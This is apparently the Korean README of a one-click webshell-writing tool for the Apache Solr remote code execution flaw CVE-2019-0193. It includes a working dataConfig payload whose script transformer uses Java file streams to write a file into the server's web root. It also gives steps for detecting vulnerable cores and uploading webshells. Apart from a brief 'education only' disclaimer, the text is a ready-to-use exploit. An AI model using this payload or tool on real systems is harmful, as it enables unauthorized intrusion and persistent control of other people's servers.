
ApacheSolrRCE(CVE-2019-0193)원클릭 셸 작성. 원리는 코드 실행을 통해 java 파일 스트림으로 웹셸을 작성하는 방식입니다.
정보 보안 교육 및 교류 목적으로만 사용하십시오. 불법 테스트 및 공격에 사용하지 마십시오.
ApacheSolrRCE(CVE-2019-0193) 원클릭 셸 작성, 원리는 코드 실행을 통해 Java 파일 스트림으로 웹셸을 작성하는 것입니다.
참고: 저자는 실력이 부족합니다. 버그가 있거나 다른 요구사항이 있다면 직접 코드를 다운로드하여 수정하십시오.
인터넷에 유포된 페이로드는 모두 명령 실행이며 웹셸을 올리기에 불편하므로 이 페이로드를 작성했습니다(123456이 반환되면 쓰기 성공을 의미).
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
먼저 '감지'를 클릭하여 core를 얻고 취약점이 있는지 확인합니다.
그런 다음 'getshell'을 클릭하면 됩니다.
참고: 웹셸을 shell 디렉터리에 넣으면 도구가 자동으로 웹셸을 드롭다운 목록에 로드합니다.
기본 프록시는 HTTP 프록시이며 포트는 8080입니다. 코드에 하드코딩되어 있으므로 필요하면 직접 컴파일하여 수정하십시오.